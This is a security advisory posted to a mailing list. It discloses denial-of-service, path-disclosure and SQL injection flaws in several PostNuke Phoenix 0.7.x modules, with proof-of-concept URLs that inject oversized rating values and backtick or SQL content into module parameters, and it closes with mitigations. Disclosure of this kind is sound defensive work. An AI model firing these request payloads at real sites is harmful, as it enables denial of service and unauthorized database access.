[<prev] [next>] [day] [month] [year] [list]
Message-ID: <007c01c32eba$70caa7b0$050010ac@rootserver>
From: novappc at novappc.com (Lorenzo Hernandez Garcia-Hierro)
Subject: PostNuke Main Modules SQL Injections , DoS and Path Disclosures
------
Product: PostNuke
Vendor: PostNuke WWW.POSTNUKE.COM
Versions Vulnerable:
PostNuke Phoenix 0.7.x.x
Phoenix 0.7.2.3 with patches ( in all versions )
Phoenix 0.7.2.3 without patches (in all versions )
0.7.2.1
(All prior versions of 0.7.2.3 with/without patches)
No vulnerable:
?
Advisory: NSRG-09-8
------
DESCRIPTION:
------
Researching with my last advisory about PHP-Nuke i found in PostNuke the
same DoS potential attack and buffer overflow
in rating related systems like Web Links, Downloads and all the main
modules! .I found path disclosures and some SQL Injections.
Main modules of phpNuke based portals again affected by security holes...
--------
FOUND VULNERABLE MODULES:
--------
***********
*DOWNLOADS*
***********
DoS attack in rating system and path disclosures at all id and related
fields:
----
Dos Attack
----
The rating system can be used for make a several DoS attack to database
server and webserver . The problem is in the
validation of the vote , you can vote with all characters that you choose!
-
Proof of Concept
-
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=addrati
ng&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE
HOST ;-)]&rating=[YOUR RANDOM CONTENT]
The [ RANDOM CONTENT ] can be a hundred thousand of 9 or similar ( all what
do you want to send ).
This generates a new rating value of :
2,147,483,647.00
or the generated random error number by mysql server.
----
Path Disclosure
----
I encountered some path disclosures in PostNuke at Downloads and WebLinks
modules , you get this path disclosure format:
Fatal error: Call to a member function on a non-object in [LOCAL PATH TO
POSTNUKE INSTALATION]/modules/Downloads/[php vulnerable file] on line xxx
-
Proof of Concept
-
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdow
nloaddetails&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdow
nloadcomments&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdow
nloadeditorial&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=brokend
ownload&lid=[RANDOM NUMERIC CONTENT]
http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=outside
downloadsetup&lid=[RANDOM NUMERIC CONTENT]
***********
*WEB_LINKS*
***********
The same with Downloads module and the same path disclosures with DoS
potential attack.
The Exploitable urls of the Downloads Vulnerabilities Proof of Concept must
be changed into Web_Links variables for use.
Web Links module is based on Downloads module totally...
***********
*SECTIONS *
***********
Path disclosures, you get with the Proof of Concept:
Fatal error: Call to a member function on a non-object in [LOCAL PATH TO
POSTNUKE INSTALLATION]/modules/Sections/[FILE] on line xxx
-
Proof of Concept
-
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=listarti
cles&secid=[BLANK]
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=listarti
cles&secid=[RANDOM CONTENT]
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarti
cle&artid=[BLANK]
http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarti
cle&artid=[RANDOM CONTENT]
***********
* FAQ *
***********
Path disclosures related to id a fileds and FAQ's.
You get error flag:
Fatal error: Cannot redeclare head() (previously declared in
/darwing/web/htdocs/beta.linex.org/header.php:44) in
/darwing/web/htdocs/beta.linex.org/header.php on line 44
-
Proof of Concept
-
http://[TARGET]/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=
`[RANDOM CHARACTERS]
***********
* SEARCH * - ({ Not totally tested }) -
***********
Path disclosure with a phpBB integration , you get searching ` a
Fatal error: Call to a member function on a non-object in [REAL PATH] on
line XxX
-
Proof of Concept
-
eXperimental:
Put in search field ` and click in submit button. walla! .
***********
* REVIEWS *
***********
Path disclosures:
Fatal error: Call to a member function on a non-object in /home/path to
..... on line XxX
-
Proof of Concept
-
http://[TARGET]/modules.php?op=modload&name=Reviews&file=index&req=showconte
nt&id=`[RANDOM]
***********
* GLOSSARY*
***********
Path disclosures and SQL INJECTION:
Warning: Supplied argument is not a valid MySQL result resource in [REAL
PATH TO SCRIPT] on line XxX
-
Proof of Concept
-
http://[TARGET]/modules.php?op=modload&name=Glossary&file=index&page=`[HERE
COMES YOUR RANDOM DATA OR SQL QUERY]
NOTE: The SQL QInjection doesn't run in all systems.
------------------------
| FINAL NOTES |
------------------------
- The Search module vulnerability is an experimental vulnerability , i
don't found more than one sites that run the combination of phpBB 1.4 and
Phoenix 0.7.x.x .
- The error flags of php must be configured to show the flags for view the
queries results and path disclosures , default this is on and you can view
all.
------------------------
| SOLUTION |
------------------------
- Configure error flags in your php.ini for hide the errors and warnings ,
this protects you from path disclosures.
- Deactivate completly affected modules if you can't change php.ini .
- Use another php portal system . (Typical paranoic/stupid solution ;-)
------------------------
| CONTACT |
------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--www.novappc.com --
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
Powered by blists - more mailing lists